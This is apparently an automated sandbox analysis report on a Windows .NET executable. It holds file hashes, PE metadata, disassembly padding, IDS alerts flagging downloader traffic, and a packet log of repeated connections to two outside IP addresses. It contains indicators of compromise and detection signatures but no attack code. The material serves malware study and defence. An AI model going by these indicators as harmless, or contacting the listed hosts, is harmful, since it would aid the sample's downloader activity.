                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Users\user\Desktop\VbcXXnmIwPPhh.exe
                                                            File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):675088
                                                            Entropy (8bit):7.923743581618393
                                                            Encrypted:false
                                                            SSDEEP:12288:t88mOMR4QeEwWbt2oBcM4fk3spK2FvBq5CbS1juVBYDQThFxB4gSB:+HRN2OBcMmk3sgGvBECbS1amkThg
                                                            MD5:C692A68EC39263ED62B3F3419039DC4C
                                                            SHA1:98DEF8045A3E691CF90076CF424BD8C981CC7112
                                                            SHA-256:63E470BBC6003996282D5706651491AA45E2F32A1C9852461343B3CCBDA64E52
                                                            SHA-512:2EB2613A4E78B5DB9523980025757331297FA210E7486FEC810BD29BB80D74A89B354D3C85D5721B1C055423DC3C9F3E3948B0ECB5B7FC54D589E74BB4B58FF7
                                                            Malicious:false
                                                            Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....].u.s.UKjT.U......o.....|......I....F.qo'.{..G...o...n0..... .N4.....B..6.z....;.s..s%..1~c.5.\.{Eb..s..h..Z.,.....[.GQ...l.H...qN.........8+.......fd(.... ..3-Cg......8}]..b.@..J..h..r_.......M../mR...t..Ibm[.'.s.0t..i...#C..4.]].ml.4.y.+...?.....Q/...w..X...@i~....h~ke.4...b..+..7V....g.2.5..wA...q0...+...T.|..q.....b....O..e8c...-.|...v..\...g....L{F>..W..>.H[.?.3....(...C-....#..Fk..54....k-.z.0...F...+.?...l..w_h..,L.......0|.}...,K#1;W...G2..:..3........zO.....p.k.P...R0rh.G.|$.U.Zyh~...C..S....0..x..K....J0.S.w..)..bS..;L.p.9(......,.Cs.......~........cZ.....tO..k..q..X.8..8o.sg....4.].F.....C.F.[.....-a=.o..(....*6..{...qnk..............4.....>w$..^..{.^.....?+..=oKuS.[...7~n..e$F~Z.Y.....w.Qk.F..........k ..1.G.G4........55....w_........5~......[.|....F.5g.R.m.9L.-.k...8m..g.....Q..n.[....qNLu.8y 7}..;.1[...........M).Z}..EN..
                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):7.870849196017935
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            • DOS Executable Generic (2002/1) 0.01%
                                                            File name:VbcXXnmIwPPhh.exe
                                                            File size:684'032 bytes
                                                            MD5:401098a467fc699acb2d256da47fdace
                                                            SHA1:87484e36df3eb0290178e4ab85b5566fb6f92b16
                                                            SHA256:c803bffcf528efc9a204a34a6a9285128f9dce25d165020fc37198d16ee50c11
                                                            SHA512:98904310b81ca4bf690492caa067245cf41f9c9a9d2f2b3ec93a0c930cfa8ac4bb8b6de4a9f38e9bd62de1ffc85bba7d9a9b4b40132b86857a8233c2e0f96aac
                                                            SSDEEP:12288:nPedfckNyIN2PB2Qig51Sz4uRhCMrFClQSzdtTJ:nPYUUnopfN4UGHrqD
                                                            TLSH:92E4124A65A9C907C4EB9BF80031E2B553728DDA7612D213BFEA7CFBB82D7011845793
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O.................0..f............... ........@.. ....................................@................................
                                                            Icon Hash:00928e8e8686b000
                                                            Entrypoint:0x4a85aa
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0xF6BE9C4F [Tue Mar 8 01:03:11 2101 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xa85570x4f.text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xaa0000x5bc.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xac0000xc.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0xa6ef00x70.text
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x20000xa65b00xa660074101145659a37c0428c259166193341False0.9416116876408716data7.877925712281058IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rsrc0xaa0000x5bc0x60085186c15e60a206ef9e8f402c90883b2False0.4231770833333333data4.11100015095948IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0xac0000xc0x2003e971e16526c5c06e8eca47faedd85f9False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_VERSION0xaa0900x32cdata0.42857142857142855
                                                            RT_MANIFEST0xaa3cc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                            DLLImport
                                                            mscoree.dll_CorExeMain
                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2024-09-26T13:44:08.575080+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749701132.226.8.16980TCP
                                                            2024-09-26T13:44:10.278251+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749701132.226.8.16980TCP
                                                            2024-09-26T13:44:11.001792+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749706188.114.96.3443TCP
                                                            2024-09-26T13:44:12.434480+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749707132.226.8.16980TCP
                                                            2024-09-26T13:44:13.000341+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749708188.114.96.3443TCP
                                                            2024-09-26T13:44:16.852101+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749712188.114.96.3443TCP
                                                            2024-09-26T13:44:18.300570+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749715188.114.96.3443TCP
                                                            2024-09-26T13:44:23.107514+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749725188.114.96.3443TCP
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Sep 26, 2024 13:44:04.826493025 CEST4970180192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:04.831465960 CEST8049701132.226.8.169192.168.2.7
                                                            Sep 26, 2024 13:44:04.831540108 CEST4970180192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:04.831887960 CEST4970180192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:04.836726904 CEST8049701132.226.8.169192.168.2.7
                                                            Sep 26, 2024 13:44:08.174153090 CEST8049701132.226.8.169192.168.2.7
                                                            Sep 26, 2024 13:44:08.179656029 CEST4970180192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:08.184556007 CEST8049701132.226.8.169192.168.2.7
                                                            Sep 26, 2024 13:44:08.521030903 CEST8049701132.226.8.169192.168.2.7
                                                            Sep 26, 2024 13:44:08.575079918 CEST4970180192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:08.576369047 CEST49705443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:08.576411963 CEST44349705188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:08.576483011 CEST49705443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:08.583803892 CEST49705443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:08.583820105 CEST44349705188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:09.071254015 CEST44349705188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:09.071423054 CEST49705443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:09.078681946 CEST49705443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:09.078705072 CEST44349705188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:09.079016924 CEST44349705188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:09.122016907 CEST49705443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:09.137556076 CEST49705443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:09.179400921 CEST44349705188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:09.255094051 CEST44349705188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:09.255182981 CEST44349705188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:09.255815029 CEST49705443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:09.262037992 CEST49705443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:09.271049976 CEST4970180192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:09.275959969 CEST8049701132.226.8.169192.168.2.7
                                                            Sep 26, 2024 13:44:10.228789091 CEST8049701132.226.8.169192.168.2.7
                                                            Sep 26, 2024 13:44:10.234520912 CEST49706443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:10.234579086 CEST44349706188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:10.234663010 CEST49706443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:10.235229015 CEST49706443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:10.235244036 CEST44349706188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:10.278250933 CEST4970180192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:10.853518009 CEST44349706188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:10.860184908 CEST49706443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:10.860222101 CEST44349706188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:11.001802921 CEST44349706188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:11.001893044 CEST44349706188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:11.002060890 CEST49706443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:11.002883911 CEST49706443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:11.007371902 CEST4970180192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:11.008780956 CEST4970780192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:11.012877941 CEST8049701132.226.8.169192.168.2.7
                                                            Sep 26, 2024 13:44:11.013605118 CEST4970180192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:11.013627052 CEST8049707132.226.8.169192.168.2.7
                                                            Sep 26, 2024 13:44:11.014084101 CEST4970780192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:11.014173031 CEST4970780192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:11.018944979 CEST8049707132.226.8.169192.168.2.7
                                                            Sep 26, 2024 13:44:12.383827925 CEST8049707132.226.8.169192.168.2.7
                                                            Sep 26, 2024 13:44:12.385116100 CEST49708443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:12.385154963 CEST44349708188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:12.385246992 CEST49708443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:12.385539055 CEST49708443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:12.385550976 CEST44349708188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:12.434479952 CEST4970780192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:12.859292030 CEST44349708188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:12.861061096 CEST49708443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:12.861076117 CEST44349708188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:13.000350952 CEST44349708188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:13.000447989 CEST44349708188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:13.000545979 CEST49708443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:13.001065969 CEST49708443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:13.005754948 CEST4970980192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:13.010628939 CEST8049709132.226.8.169192.168.2.7
                                                            Sep 26, 2024 13:44:13.010751009 CEST4970980192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:13.010843992 CEST4970980192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:13.015666962 CEST8049709132.226.8.169192.168.2.7
                                                            Sep 26, 2024 13:44:14.390242100 CEST8049709132.226.8.169192.168.2.7
                                                            Sep 26, 2024 13:44:14.390527964 CEST8049709132.226.8.169192.168.2.7
                                                            Sep 26, 2024 13:44:14.390611887 CEST4970980192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:14.391753912 CEST49710443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:14.391819000 CEST44349710188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:14.391910076 CEST49710443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:14.392165899 CEST49710443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:14.392198086 CEST44349710188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:14.922988892 CEST44349710188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:14.924832106 CEST49710443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:14.924873114 CEST44349710188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:15.072851896 CEST44349710188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:15.072951078 CEST44349710188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:15.073010921 CEST49710443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:15.073530912 CEST49710443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:15.077003956 CEST4970980192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:15.078044891 CEST4971180192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:15.082122087 CEST8049709132.226.8.169192.168.2.7
                                                            Sep 26, 2024 13:44:15.082315922 CEST4970980192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:15.082854986 CEST8049711132.226.8.169192.168.2.7
                                                            Sep 26, 2024 13:44:15.082926989 CEST4971180192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:15.083157063 CEST4971180192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:15.087971926 CEST8049711132.226.8.169192.168.2.7
                                                            Sep 26, 2024 13:44:15.913089037 CEST8049711132.226.8.169192.168.2.7
                                                            Sep 26, 2024 13:44:15.914896011 CEST49712443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:15.914947987 CEST44349712188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:15.915008068 CEST49712443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:15.915452957 CEST49712443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:15.915467978 CEST44349712188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:15.965811014 CEST4971180192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:16.693789959 CEST44349712188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:16.695713043 CEST49712443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:16.695746899 CEST44349712188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:16.852103949 CEST44349712188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:16.852204084 CEST44349712188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:16.852267027 CEST49712443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:16.852878094 CEST49712443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:16.856240988 CEST4971180192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:16.857526064 CEST4971380192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:16.861685991 CEST8049711132.226.8.169192.168.2.7
                                                            Sep 26, 2024 13:44:16.861754894 CEST4971180192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:16.862865925 CEST8049713132.226.8.169192.168.2.7
                                                            Sep 26, 2024 13:44:16.862936020 CEST4971380192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:16.863032103 CEST4971380192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:16.867958069 CEST8049713132.226.8.169192.168.2.7
                                                            Sep 26, 2024 13:44:17.661098003 CEST8049713132.226.8.169192.168.2.7
                                                            Sep 26, 2024 13:44:17.662225008 CEST49715443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:17.662286997 CEST44349715188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:17.662370920 CEST49715443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:17.662621975 CEST49715443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:17.662636995 CEST44349715188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:17.715775967 CEST4971380192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:18.146544933 CEST44349715188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:18.148281097 CEST49715443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:18.148322105 CEST44349715188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:18.300658941 CEST44349715188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:18.300915003 CEST44349715188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:18.300973892 CEST49715443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:18.301362991 CEST49715443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:18.305545092 CEST4971380192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:18.307432890 CEST4971880192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:18.310837030 CEST8049713132.226.8.169192.168.2.7
                                                            Sep 26, 2024 13:44:18.310899973 CEST4971380192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:18.312330961 CEST8049718132.226.8.169192.168.2.7
                                                            Sep 26, 2024 13:44:18.312396049 CEST4971880192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:18.312475920 CEST4971880192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:18.317189932 CEST8049718132.226.8.169192.168.2.7
                                                            Sep 26, 2024 13:44:19.110460043 CEST8049718132.226.8.169192.168.2.7
                                                            Sep 26, 2024 13:44:19.112067938 CEST49719443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:19.112118959 CEST44349719188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:19.112660885 CEST49719443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:19.112776995 CEST49719443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:19.112785101 CEST44349719188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:19.153280973 CEST4971880192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:19.683768988 CEST44349719188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:19.686436892 CEST49719443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:19.686471939 CEST44349719188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:19.842576027 CEST44349719188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:19.842689991 CEST44349719188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:19.847403049 CEST44349719188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:19.847465992 CEST49719443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:19.850327015 CEST49719443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:19.857701063 CEST49719443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:20.075227976 CEST4971880192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:20.079499960 CEST4972080192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:20.080312014 CEST8049718132.226.8.169192.168.2.7
                                                            Sep 26, 2024 13:44:20.083381891 CEST4971880192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:20.084346056 CEST8049720132.226.8.169192.168.2.7
                                                            Sep 26, 2024 13:44:20.084857941 CEST4972080192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:20.084980965 CEST4972080192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:20.089740992 CEST8049720132.226.8.169192.168.2.7
                                                            Sep 26, 2024 13:44:20.990175009 CEST8049720132.226.8.169192.168.2.7
                                                            Sep 26, 2024 13:44:20.991724014 CEST49723443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:20.991838932 CEST44349723188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:20.991925001 CEST49723443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:20.992239952 CEST49723443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:20.992278099 CEST44349723188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:21.043884993 CEST4972080192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:21.464622021 CEST44349723188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:21.474401951 CEST49723443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:21.474493027 CEST44349723188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:21.590862036 CEST44349723188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:21.591146946 CEST44349723188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:21.594502926 CEST49723443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:21.594960928 CEST49723443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:21.597765923 CEST4972080192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:21.598763943 CEST4972480192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:21.602962017 CEST8049720132.226.8.169192.168.2.7
                                                            Sep 26, 2024 13:44:21.603636980 CEST8049724132.226.8.169192.168.2.7
                                                            Sep 26, 2024 13:44:21.603719950 CEST4972080192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:21.603746891 CEST4972480192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:21.603833914 CEST4972480192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:21.608604908 CEST8049724132.226.8.169192.168.2.7
                                                            Sep 26, 2024 13:44:22.485083103 CEST8049724132.226.8.169192.168.2.7
                                                            Sep 26, 2024 13:44:22.491204023 CEST49725443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:22.491261959 CEST44349725188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:22.491348982 CEST49725443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:22.494848967 CEST49725443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:22.494879961 CEST44349725188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:22.528340101 CEST4972480192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:22.975681067 CEST44349725188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:22.977840900 CEST49725443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:22.977910995 CEST44349725188.114.96.3192.168.2.7
